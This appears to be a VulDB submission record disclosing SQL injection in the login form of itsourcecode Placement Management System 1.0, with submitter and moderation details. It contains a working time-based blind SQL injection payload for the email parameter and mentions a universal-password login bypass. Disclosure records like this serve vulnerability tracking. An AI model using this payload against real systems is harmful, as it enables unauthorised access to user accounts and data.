Submit #383859: itsourcecode Placement Management System 1.0 SQLi

Title: itsourcecode Placement Management System 1.0 SQLi
Description: In the login.php file, the email field is not properly sanitized, which may lead to SQL injection vulnerabilities. Additionally, as long as there is any data in the users table of the database, it is possible to log in using a universal password.

PoC:
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]#' AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zIEe) AND 'NilV'='NilV&pass=123
Source: https://github.com/DeepMountains/Mirage/blob/main/CVE11-1.md
User: Dee.Mirage (UID 71702)
Submission: 31/07/2024 16:15 (2 years ago)
Moderation: 03/08/2024 08:49 (3 days later)
Status: Accepted
VulDB entry: 273540 [itsourcecode Placement Management System 1.0 login.php email SQL injection]
Points: 20
